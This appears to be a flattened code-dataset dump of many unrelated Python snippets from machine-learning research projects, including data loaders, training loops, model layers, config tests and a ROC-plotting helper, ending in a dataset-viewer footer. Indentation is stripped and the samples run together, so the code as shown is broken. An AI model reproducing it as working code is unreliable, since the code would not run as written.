joint_info_dst = ds3d.get_joint_info(skeleton_type_dst)
selected_indices = [get_index(name) for name in joint_info_dst.names]
return torch.gather(coords_src, dim=(- 2), index=selected_indices) |
def mask_tube_in_sequence(mask_ratio: float, tube_size: int, len_sequence: int, device: (str | torch.device)='cpu'):
num_masked = floor((len_sequence * mask_ratio))
indices_permuted = ((torch.randperm((len_sequence // tube_size), device=device) * tube_size).repeat_interleave(tube_size) + torch.arange(tube_size, device=device).repeat((len_sequence // tube_size)))
indices_not_kept: torch.Tensor = indices_permuted[:num_masked].sort()[0]
indices_kept: torch.Tensor = indices_permuted[num_masked:].sort()[0]
indices = torch.cat((indices_not_kept, indices_kept))
inversed_temporal_masked_indices = torch.argsort(indices)
return (indices_not_kept, indices_kept, inversed_temporal_masked_indices, num_masked) |
def main(config, args):
set_seed(config.TRAIN.manualSeed)
Mission = TextSR(config, args)
if args.test:
if (not os.path.exists(config.TRAIN.ckpt_dir)):
os.mkdir(config.TRAIN.ckpt_dir)
result_path = os.path.join(config.TRAIN.ckpt_dir, 'test_result.csv')
if (not os.path.exists(result_path)):
with open(result_path, 'w+') as out:
writer = csv.writer(out)
writer.writerow(['recognizer', 'subset', 'accuracy', 'psnr', 'ssim'])
Mission.test()
else:
if (not os.path.exists(config.TRAIN.ckpt_dir)):
os.mkdir(config.TRAIN.ckpt_dir)
log_path = os.path.join(config.TRAIN.ckpt_dir, 'log.csv')
if (not os.path.exists(log_path)):
with open(log_path, 'w+') as out:
writer = csv.writer(out)
writer.writerow(['epoch', 'dataset', 'accuracy', 'psnr_avg', 'ssim_avg', 'best', 'best_sum'])
Mission.train() |
class SquadDataTrainingArguments():
model_type: str = field(default=None, metadata={'help': ('Model type selected in the list: ' + ', '.join(MODEL_TYPES))})
data_dir: str = field(default=None, metadata={'help': 'The input data dir. Should contain the .json files for the SQuAD task.'})
max_seq_length: int = field(default=128, metadata={'help': 'The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.'})
doc_stride: int = field(default=128, metadata={'help': 'When splitting up a long document into chunks, how much stride to take between chunks.'})
max_query_length: int = field(default=64, metadata={'help': 'The maximum number of tokens for the question. Questions longer than this will be truncated to this length.'})
max_answer_length: int = field(default=30, metadata={'help': 'The maximum length of an answer that can be generated. This is needed because the start and end predictions are not conditioned on one another.'})
overwrite_cache: bool = field(default=False, metadata={'help': 'Overwrite the cached training and evaluation sets'})
version_2_with_negative: bool = field(default=False, metadata={'help': 'If true, the SQuAD examples contain some that do not have an answer.'})
null_score_diff_threshold: float = field(default=0.0, metadata={'help': 'If null_score - best_non_null is greater than the threshold predict null.'})
n_best_size: int = field(default=20, metadata={'help': 'If null_score - best_non_null is greater than the threshold predict null.'})
lang_id: int = field(default=0, metadata={'help': 'language id of input for language-specific xlm models (see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)'})
threads: int = field(default=1, metadata={'help': 'multiple threads for converting example to features'}) |
def parse_synthesize_args():
parser = ArgumentParser(description='Wolf Synthesize')
parser.add_argument('--mode', choices=['sample', 'reconstruct', 'interpolate', 'switch', 'classify'], help='synthesis mode', required=True)
parser.add_argument('--seed', type=int, default=None, metavar='S', help='random seed')
parser.add_argument('--dataset', choices=['cifar10', 'lsun', 'imagenet', 'celeba'], help='data set', required=True)
parser.add_argument('--category', choices=[None, 'bedroom', 'tower', 'church_outdoor'], help='category', default=None)
parser.add_argument('--image_size', type=int, required=True, metavar='N', help='input image size')
parser.add_argument('--workers', default=4, type=int, metavar='N', help='number of data loading workers (default: 4)')
parser.add_argument('--n_bits', type=int, default=8, metavar='N', help='number of bits per pixel.')
parser.add_argument('--model_path', help='path for saving model file.', required=True)
parser.add_argument('--data_path', help='path for data file.', required=True)
parser.add_argument('--tau', type=float, default=1.0, metavar='S', help='temperature for iw decoding (default: 1.0)')
parser.add_argument('--nsamples', type=int, default=256, metavar='N', help='number of samples.')
parser.add_argument('--make_grid', action='store_true', help='make grid of image')
parser.add_argument('--probe', choices=['svm-linear', 'svm-rbf', 'logistic'], default=None, help='classifier for probe')
return parser.parse_args() |
def get_config():
config = ml_collections.ConfigDict()
config.actor_lr = 0.0003
config.value_lr = 0.0003
config.critic_lr = 0.0003
config.hidden_dims = (256, 256)
config.discount = 0.99
config.expectile = 0.7
config.temperature = 0.5
config.dropout_rate = 0.1
config.tau = 0.005
return config |
def indice_conv_backward(features, filters, out_bp, indice_pairs, indice_pair_num, inverse=False, subm=False):
if (filters.dtype == torch.float32):
return sparse_conv_ext.indice_conv_backward_fp32(features, filters, out_bp, indice_pairs, indice_pair_num, int(inverse), int(subm))
elif (filters.dtype == torch.half):
return sparse_conv_ext.indice_conv_backward_half(features, filters, out_bp, indice_pairs, indice_pair_num, int(inverse), int(subm))
else:
raise NotImplementedError |
def generate_threats():
generate_fixes_table('Number of correct fixes by removing bugs with overlapping developer fixes in the CodeT5 training data', ALL_FIXES, (D4J1_OVERLAPPING_BUGS | D4J2_OVERLAPPING_BUGS)) |
def save_model(iter_, model_dir, filename, model, optimizer):
torch.save({'iteration': iter_, 'model_state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict()}, os.path.join(model_dir, filename)) |
def plot_roc(tpr_list, fpr_list, attack_name):
plt.figure(figsize=(10, 6))
plt.plot(fpr_list, tpr_list, '-', label=attack_name)
plt.title(f'ROC_{attack_name}_Attack')
plt.legend(loc=4)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.grid()
plt.savefig(f'{attack_name}_ROC_Curve', bbox_inches='tight')
plt.show() |
def test_glorot_1d_not_supported():
from lasagne.init import GlorotNormal
with pytest.raises(RuntimeError):
GlorotNormal().sample((100,)) |
def cat_desc_to_id(cat_desc):
if isinstance(cat_desc, (list, tuple)):
return tuple((_cat_ids[c] for c in cat_desc))
else:
return _cat_ids[cat_desc] |
def set_empty_labels(doc):
labels = ([0] * len(list(doc.sents)))
doc._.Labels = labels
doc._.CLPR_Labels = labels
return doc |
class HDFShardDataset(Dataset):
def __init__(self, shard_dir, shard_names=None, primary_key=None, stride=1):
super().__init__()
self.shard_dir = shard_dir
self.shard_names = shard_names
if (not shard_names):
self.shard_names = sorted(os.listdir(shard_dir))
self.primary_key = self.__primary_key(primary_key)
self.stride = stride
(self.shard_len, self.dataset_len) = self.__shard_len_dataset_len()
def __len__(self):
return self.dataset_len
def __getitem__(self, idx):
shard_num = (idx // self.shard_len)
idx -= (shard_num * self.shard_len)
nth_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[shard_num]), 'r')
keys = list(nth_shard.keys())
item = {}
for key in keys:
item[key] = nth_shard[key][(idx * self.stride):((idx + 1) * self.stride)]
nth_shard.close()
return item
def __primary_key(self, primary_key):
first_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[0]), 'r')
if (not primary_key):
primary_key = list(first_shard.keys())[0]
first_shard.close()
return primary_key
def __shard_len_dataset_len(self):
first_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[0]), 'r')
last_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[(- 1)]), 'r')
rows_per_shard = len(first_shard[self.primary_key])
rows_per_last_shard = len(last_shard[self.primary_key])
dataset_len = ((rows_per_shard * (len(self.shard_names) - 1)) // self.stride)
dataset_len += (rows_per_last_shard // self.stride)
shard_len = (rows_per_shard // self.stride)
first_shard.close()
last_shard.close()
return (shard_len, dataset_len) |
class ReinitFL():
def __init__(self, config, server, client_list):
self.max_round = config.MAX_ROUND
self.server = server
self.client_list = client_list
(self.list_loss, self.list_acc, self.list_est_time, self.list_model_size) = ([], [], [], [])
def main(self):
start = timer()
for idx in range(self.max_round):
(list_state_dict, list_num, list_last_lr) = ([], [], [])
for client in self.client_list:
(sd, npc, last_lr) = client.main()
list_state_dict.append(sd)
list_num.append(npc)
list_last_lr.append(last_lr)
last_lr = list_last_lr[0]
for client_lr in list_last_lr[1:]:
assert (client_lr == last_lr)
(list_mask, new_list_sd) = self.server.main(idx, list_state_dict, list_num, last_lr, start, self.list_loss, self.list_acc, self.list_est_time, self.list_model_size)
for (client, new_sd) in zip(self.client_list, new_list_sd):
client.load_state_dict(new_sd)
client.load_mask(list_mask) |
def randint(low: IntNumType, high: Optional[IntNumType]=None, size: Optional[Size]=None, dtype: Type=np.int32, random_state: Optional[np.random.RandomState]=None) -> Any:
if (random_state is None):
random_state = get_random_state()
return random_state.randint(low, high, size, dtype) |
def test_mildnonaxi_sigmat2_direct():
idf = dehnendf(beta=0.0)
pot = [LogarithmicHaloPotential(normalize=1.0)]
edf = evolveddiskdf(idf, pot=pot, to=(- 10.0))
st2 = edf.sigmaT2(0.9, phi=0.2, integrate_method='rk6_c', grid=False)
ist2 = idf.sigmaT2(0.9)
assert (numpy.fabs((numpy.log(st2) - numpy.log(ist2))) < 0.025), 'sigmat2 of evolveddiskdf for axisymmetric potential is not equal to that of initial DF when calculated directly'
return None |
class ConvLayer(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, groups=1, IN=False):
super(ConvLayer, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=False, groups=groups)
if IN:
self.bn = nn.InstanceNorm2d(out_channels, affine=True)
else:
self.bn = nn.BatchNorm2d(out_channels)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return self.relu(x) |
def filter_data(df, header, restraints={}):
filtered = []
for row in df:
to_add = True
for r in restraints.keys():
idx = header[r]
val = row[(- 1)][idx]
to_add = (to_add and (val in restraints[r]))
if to_add:
filtered.append(row)
return filtered |
def on_draw():
window.clear()
fps_display.draw()
for line in static_lines:
body = line.body
pv1 = (body.position + line.a.rotated(body.angle))
pv2 = (body.position + line.b.rotated(body.angle))
pyglet.graphics.draw(2, pyglet.gl.GL_LINES, ('v2f', (pv1.x, pv1.y, pv2.x, pv2.y)), ('c3f', ((0.8, 0.8, 0.8) * 2)))
batch.draw()
for logo_sprite in logos:
ps = logo_sprite.shape.get_vertices()
n = len(ps)
ps = [c for p in ps for c in p]
pyglet.graphics.draw(n, pyglet.gl.GL_LINE_LOOP, ('v2f', ps), ('c3f', ((1, 0, 0) * n))) |
def normal_entropy(std):
var = std.pow(2)
entropy = (0.5 + (0.5 * torch.log(((2 * var) * math.pi))))
return entropy.sum(1, keepdim=True) |
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('--num-shards', type=int)
args = parser.parse_args()
assert ((args.num_shards is not None) and (args.num_shards > 1))
with open(args.input, 'r', encoding='utf-8') as h:
with contextlib.ExitStack() as stack:
outputs = [stack.enter_context(open(((args.input + '.shard') + str(i)), 'w', encoding='utf-8')) for i in range(args.num_shards)]
doc = []
first_doc = ([True] * args.num_shards)
def output_doc(i):
if (not first_doc[i]):
outputs[i].write('\n')
first_doc[i] = False
for line in doc:
outputs[i].write(line)
doc.clear()
num_docs = 0
for line in h:
if (line.strip() == ''):
output_doc((num_docs % args.num_shards))
num_docs += 1
else:
doc.append(line)
output_doc((num_docs % args.num_shards)) |
def main():
if (not os.path.exists(opt.output_path)):
os.makedirs(opt.output_path)
sys.stdout.write(('loading %s...' % opt.filename))
sd = SensorData(opt.filename)
sys.stdout.write('loaded!\n')
if opt.export_depth_images:
sd.export_depth_images(os.path.join(opt.output_path, 'depth'))
if opt.export_color_images:
sd.export_color_images(os.path.join(opt.output_path, 'color'))
if opt.export_poses:
sd.export_poses(os.path.join(opt.output_path, 'pose'))
if opt.export_intrinsics:
sd.export_intrinsics(os.path.join(opt.output_path, 'intrinsic')) |
def get_parsed_sent(xml_file, sent_num, map, nlp):
catalan = False
conllu = ''
mark_xml = open(xml_file).read().encode('utf8')
base_root = fromstring(mark_xml, xmlparser)
tokens = {}
sents = {}
terms = {}
for annotation in base_root:
if (annotation.tag == 'text'):
for token in annotation:
token_idx = token.get('id')
if (token_idx is None):
catalan = True
token_idx = token.get('wid')
tok = token.text
sent = token.get('sent')
tokens[token_idx] = tok
sents[token_idx] = sent
if (annotation.tag == 'terms'):
for term in annotation:
if (term.tag == 'term'):
idx = term.get('id')
if (idx is None):
idx = term.get('tid')
idx = idx.replace('t', 'w')
lemma = term.get('lemma')
if catalan:
pos = term.get('pos')
else:
pos = term.get('morphofeat')
upos = map_to_upos(pos, map)
terms[idx] = (lemma, pos, upos)
sentidx2tokenidx = get_sents(sents)
token_idxs = sentidx2tokenidx[str(sent_num)]
text = ' '.join([tokens[i] for i in token_idxs])
processed = nlp(text)
deps = [(t.head, t.deprel) for t in processed.sentences[0].words]
for (i, tokenidx) in enumerate(token_idxs):
token = tokens[tokenidx]
(lemma, tag, pos) = terms[tokenidx]
(head, deprel) = deps[i]
conllu += '{}\t{}\t{}\t{}\t{}\t_\t{}\t{}\t_\t_\n'.format((i + 1), token, lemma, pos, tag, head, deprel)
return conllu |
def test_cif_realnvp_config():
config = get_config(dataset='mnist', model='realnvp', use_baseline=False)
true_config = {'schema_type': 'multiscale-realnvp', 'use_cond_affine': True, 'pure_cond_affine': False, 'g_hidden_channels': [64, 64, 64, 64], 'num_u_channels': 1, 'st_nets': [8, 8], 'p_nets': [64, 64], 'q_nets': [64, 64], 'early_stopping': True, 'train_batch_size': 100, 'valid_batch_size': 500, 'test_batch_size': 500, 'opt': 'adam', 'lr': 0.0001, 'weight_decay': 0.0, 'logit_tf_lambda': 1e-06, 'logit_tf_scale': 256, 'dequantize': True, 'act_norm': False, 'batch_norm': True, 'batch_norm_apply_affine': False, 'batch_norm_use_running_averages': True, 'batch_norm_momentum': 0.1, 'lr_schedule': 'none', 'max_bad_valid_epochs': 50, 'max_grad_norm': None, 'max_epochs': 1000, 'epochs_per_test': 1, 'train_objective': 'iwae', 'num_train_importance_samples': 1, 'num_valid_importance_samples': 5, 'num_test_importance_samples': 10}
assert (true_config == config) |
def fetch_history_for_many_ags(ags_list):
AG_RKI_SUMS_QUERY_BASE_URL = os.environ['AG_RKI_SUMS_QUERY_BASE_URL']
md = 'Meldedatum'
ts = 'timestamp'
idlk = 'IdLandkreis'
t_start = '2020-05-01 22:00:00'
d_end = (datetime.today() - timedelta(days=0))
t_end = f"{d_end.strftime('%Y-%m-%d')} 23:59:59"
ags_padded_list = [str(ags).zfill(5) for ags in ags_list]
ags_padded_list_cs = ', '.join((f"'{a}'" for a in ags_padded_list))
where_clause = f"({md}>{ts} '{t_start}') AND ({md}<{ts} '{t_end}') AND ({idlk} IN ({ags_padded_list_cs}))"
record_count_limit = (52 * (10 ** 4))
paramdict = {'where': where_clause, 'returnGeometry': 'false', 'outFields': '*', 'orderByFields': 'Meldedatum asc', 'resultOffset': 0, 'resultRecordCount': record_count_limit, 'f': 'json'}
params = urllib.parse.urlencode(paramdict)
url = f'{AG_RKI_SUMS_QUERY_BASE_URL}{params}'
log.info('Query for history for these AGSs: %s', ags_list)
log.info('query params:%s', json.dumps(paramdict, indent=2))
attempt = 0
while True:
attempt += 1
if (attempt >= 10):
sys.exit('too many attempts, stop retrying')
try:
resp = requests.get(url, headers={'user-agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}, timeout=(3.05, 75))
resp.raise_for_status()
except requests.exceptions.RequestException as err:
log.info('request error (attempt %s): %s', attempt, err)
log.info('retry soon')
time.sleep(15)
continue
log.info('Got OK response, parse through data')
data = resp.json()
if ('features' in data):
log.info('response looks good')
break
log.info('unexpected data (attempt %s) -- retry soon:\n%s', attempt, json.dumps(data, indent=2))
time.sleep(15)
log.info('response contains %s feature objects', len(data['features']))
if (len(data['features']) > (0.6 * record_count_limit)):
log.warning('that is close to %s', record_count_limit)
data_by_ags = {}
for ags in ags_list:
data_by_ags[ags] = {'timestrings': [], 'cases': [], 'deaths': []}
for obj in (o['attributes'] for o in data['features']):
md_aware_loc = datetime.fromtimestamp(int((obj['Meldedatum'] / 1000.0)), tz=pytz.timezone('Europe/Amsterdam'))
md_aware_utc = md_aware_loc.astimezone(pytz.utc)
md_aware_utc = (md_aware_utc + timedelta(hours=17))
ags = int(obj['IdLandkreis'])
data_by_ags[ags]['timestrings'].append(md_aware_utc.isoformat())
data_by_ags[ags]['cases'].append(obj['SummeFall'])
data_by_ags[ags]['deaths'].append(obj['SummeTodesfall'])
dataframes = {}
for (ags, data) in data_by_ags.items():
df = pd.DataFrame(data={ags: data['cases'], f'{ags}_deaths': data['deaths']}, index=data['timestrings'])
df.index = pd.to_datetime(df.index)
df.index.name = 'time_iso8601'
dataframes[ags] = df
log.info('aggregated %s dataframes', len(dataframes))
return dataframes |
def convert_beit(ckpt):
new_ckpt = OrderedDict()
for (k, v) in ckpt.items():
if k.startswith('blocks'):
new_key = k.replace('blocks', 'layers')
if ('norm' in new_key):
new_key = new_key.replace('norm', 'ln')
elif ('mlp.fc1' in new_key):
new_key = new_key.replace('mlp.fc1', 'ffn.layers.0.0')
elif ('mlp.fc2' in new_key):
new_key = new_key.replace('mlp.fc2', 'ffn.layers.1')
new_ckpt[new_key] = v
elif k.startswith('patch_embed'):
new_key = k.replace('patch_embed.proj', 'patch_embed.projection')
new_ckpt[new_key] = v
else:
new_key = k
new_ckpt[new_key] = v
return new_ckpt |
class DepthEstimatorOutput(ModelOutput):
loss: Optional[torch.FloatTensor] = None
predicted_depth: torch.FloatTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None |
def linelistPath(linelist, dr=None):
if (dr is None):
dr = 'current'
specReduxPath = apogeeSpectroReduxDirPath(dr=dr)
return os.path.join(specReduxPath, 'speclib', 'linelists', linelist) |
class KAF(Layer):
def __init__(self, num_parameters, D=20, boundary=3.0, conv=False, init_fcn=None, kernel='gaussian', **kwargs):
self.num_parameters = num_parameters
self.D = D
self.boundary = boundary
self.init_fcn = init_fcn
self.conv = conv
if self.conv:
self.unsqueeze_dim = 4
else:
self.unsqueeze_dim = 2
self.kernel = kernel
if (not (kernel in ['gaussian', 'relu', 'softplus'])):
raise ValueError('Kernel not recognized (must be {gaussian, relu, softplus})')
super().__init__(**kwargs)
def build(self, input_shape):
d = np.linspace((- self.boundary), self.boundary, self.D).astype(np.float32).reshape((- 1), 1)
if self.conv:
self.dict = self.add_weight(name='dict', shape=(1, 1, 1, 1, self.D), initializer='uniform', trainable=False)
tf.assign(self.dict, d.reshape(1, 1, 1, 1, (- 1)))
else:
self.dict = self.add_weight(name='dict', shape=(1, 1, self.D), initializer='uniform', trainable=False)
tf.assign(self.dict, d.reshape(1, 1, (- 1)))
if (self.kernel == 'gaussian'):
self.kernel_fcn = self.gaussian_kernel
interval = (d[1] - d[0])
sigma = (2 * interval)
self.gamma = (0.5 / np.square(sigma))
elif (self.kernel == 'softplus'):
self.kernel_fcn = self.softplus_kernel
else:
self.kernel_fcn = self.relu_kernel
if self.conv:
self.alpha = self.add_weight(name='alpha', shape=(1, 1, 1, self.num_parameters, self.D), initializer='normal', trainable=True)
else:
self.alpha = self.add_weight(name='alpha', shape=(1, self.num_parameters, self.D), initializer='normal', trainable=True)
if (self.init_fcn is not None):
if (self.kernel == 'gaussian'):
kernel_matrix = np.exp(((- self.gamma) * ((d - d.T) ** 2)))
elif (self.kernel == 'softplus'):
kernel_matrix = np.log((np.exp((d - d.T)) + 1.0))
else:
raise ValueError('Cannot perform kernel ridge regression with ReLU kernel (singular matrix)')
alpha_init = np.linalg.solve((kernel_matrix + (1e-05 * np.eye(self.D))), self.init_fcn(d)).reshape((- 1))
if self.conv:
tf.assign(self.alpha, np.repeat(alpha_init.reshape(1, 1, 1, 1, (- 1)), self.num_parameters, axis=3))
else:
tf.assign(self.alpha, np.repeat(alpha_init.reshape(1, 1, (- 1)), self.num_parameters, axis=1))
super(KAF, self).build(input_shape)
def gaussian_kernel(self, x):
return tf.exp(((- self.gamma) * ((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict) ** 2.0)))
def softplus_kernel(self, x):
return tf.softplus((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict))
def relu_kernel(self, x):
return tf.relu((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict))
def call(self, x):
kernel_matrix = self.kernel_fcn(x)
return tf.reduce_sum((kernel_matrix * self.alpha), axis=self.unsqueeze_dim) |
def rotate_and_shift_coordination(orig_x, orig_y, orig_d, coordi_shift_x, coordi_shift_y, coordi_rotate_d):
(shift_x, shift_y, transformed_d) = rotate_coordination(orig_x, orig_y, orig_d, coordi_rotate_d)
(transformed_x, transformed_y) = shift_coordination(shift_x, shift_y, coordi_shift_x, coordi_shift_y)
return (transformed_x, transformed_y, transformed_d) |
def train_one(task, model, opt, args, grad):
model['ebd'].train()
model['clf'].train()
opt.zero_grad()
(support, query) = task
XS = model['ebd'](support)
YS = support['label']
XQ = model['ebd'](query)
YQ = query['label']
(_, loss) = model['clf'](XS, YS, XQ, YQ)
if (loss is not None):
loss.backward()
if torch.isnan(loss):
return
if (args.clip_grad is not None):
nn.utils.clip_grad_value_(grad_param(model, ['ebd', 'clf']), args.clip_grad)
grad['clf'].append(get_norm(model['clf']))
grad['ebd'].append(get_norm(model['ebd']))
opt.step() |
def fed_test(fed, running_model, val_loaders, verbose, adversary=None):
mark = ('s' if (adversary is None) else 'r')
val_acc_list = [None for _ in range(fed.client_num)]
val_loss_mt = AverageMeter()
for client_idx in range(fed.client_num):
fed.download(running_model, client_idx)
(val_loss, val_acc) = test(running_model, val_loaders[client_idx], loss_fun, device, adversary=adversary)
val_loss_mt.append(val_loss)
val_acc_list[client_idx] = val_acc
if (verbose > 0):
print(' {:<19s} Val {:s}Loss: {:.4f} | Val {:s}Acc: {:.4f}'.format(('User-' + fed.clients[client_idx]), mark.upper(), val_loss, mark.upper(), val_acc))
wandb.log({f'{fed.clients[client_idx]} val_{mark}-acc': val_acc}, commit=False)
return (val_acc_list, val_loss_mt.avg) |
def prepare_query_box(boxes_list, q, scene):
def get_boxes_idx(box):
if (box in boxes_list):
return boxes_list.index(box)
else:
boxes_list.append(box)
return (len(boxes_list) - 1)
def add_boxes_by_rids(rids):
def get_box_xyxy(obj):
(x, y, w, h) = (obj['x'], obj['y'], obj['w'], obj['h'])
return (x, y, (x + w), (y + h))
boxes_idx = []
for rid in rids:
ref = scene['objects'][rid]
ref_box = list(get_box_xyxy(ref))
boxes_idx.append(get_boxes_idx(ref_box))
return boxes_idx
sent = list(q['question'].split())
query_boxes_seq = []
for (span, rids_str) in q['annotations']['question'].items():
span = tuple(map(int, span.split(':')))
if (len(span) == 1):
span = [span[0], (span[0] + 1)]
sent[(span[1] - 1)] = f'{sent[(span[1] - 1)]}{BOXES_PLACEHOLDER}'
boxes_idx = add_boxes_by_rids(rids_str.split(','))
query_boxes_seq.append(boxes_idx)
sent_converted = ' '.join(sent).strip()
return (boxes_list, sent_converted, query_boxes_seq) |
def standard_pole_step():
from phcpy.phcpy2c3 import py2c_padcon_standard_pole_step
return py2c_padcon_standard_pole_step() |
def cg(Ax, b, cg_iters=100):
x = np.zeros_like(b)
r = b.copy()
p = r.copy()
r_dot_old = np.dot(r, r)
for _ in range(cg_iters):
z = Ax(p)
alpha = (r_dot_old / (np.dot(p, z) + EPS))
x += (alpha * p)
r -= (alpha * z)
r_dot_new = np.dot(r, r)
p = (r + ((r_dot_new / r_dot_old) * p))
r_dot_old = r_dot_new
if (np.linalg.norm(p) < EPS):
break
return x |
class UCM(ImageFolder):
def __init__(self, root: str='.data/UCMerced_LandUse', transform: T.Compose=T.Compose([T.ToTensor()])):
super().__init__(root=os.path.join(root, 'Images'), transform=transform) |
def BasicTransposeConv2d(in_channels, out_channels, kernel_size, stride, pad, dilation):
output_pad = ((((stride + (2 * pad)) - (kernel_size * dilation)) + dilation) - 1)
return nn.Sequential(nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, pad, output_pad, dilation, bias=False), nn.BatchNorm2d(out_channels), nn.LeakyReLU(inplace=True, negative_slope=0.2)) |
def main(config='config/finetune/agnews/train.json'):
cfg = Config(**json.load(open(config, 'r')))
cfg_data = data.Config(**json.load(open(cfg.cfg_data, 'r')))
cfg_model = models.Config(**json.load(open(cfg.cfg_model, 'r')))
cfg_optim = trainer.Config(**json.load(open(cfg.cfg_optim, 'r')))
set_seeds(cfg.seed)
TaskDataset = data.get_class(cfg_data.task)
tokenizer = tokenization.FullTokenizer(vocab_file=cfg_data.vocab_file, do_lower_case=True)
dataset = TaskDataset(cfg_data.data_file[cfg.mode], pipelines=[data.RemoveSymbols('\\'), data.Tokenizing(tokenizer.convert_to_unicode, tokenizer.tokenize), data.AddSpecialTokensWithTruncation(cfg_data.max_len), data.TokenIndexing(tokenizer.convert_tokens_to_ids, TaskDataset.labels, cfg_data.max_len)], n_data=None)
dataset = TensorDataset(*dataset.get_tensors())
data_iter = DataLoader(dataset, batch_size=cfg_optim.batch_size, shuffle=True)
model = models.BlendCNN(cfg_model, len(TaskDataset.labels))
checkpoint.load_embedding(model.embed, cfg.pretrain_file)
optimizer = optim.optim4GPU(cfg_optim, model)
train_loop = trainer.TrainLoop(cfg_optim, model, data_iter, optimizer, cfg.save_dir, get_device())
def get_loss(model, batch, global_step):
(input_ids, segment_ids, input_mask, label_id) = batch
logits = model(input_ids, segment_ids, input_mask)
loss = nn.CrossEntropyLoss()(logits, label_id)
return loss
def evaluate(model, batch):
(input_ids, segment_ids, input_mask, label_id) = batch
logits = model(input_ids, segment_ids, input_mask)
(_, label_pred) = logits.max(1)
result = (label_pred == label_id).float()
accuracy = result.mean()
return (accuracy, result)
if (cfg.mode == 'train'):
train_loop.train(get_loss, cfg.model_file, None)
print('Training has been done properly.')
elif (cfg.mode == 'eval'):
results = train_loop.eval(evaluate, cfg.model_file)
total_accuracy = torch.cat(results).mean().item()
print(f'Accuracy: {total_accuracy}') |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.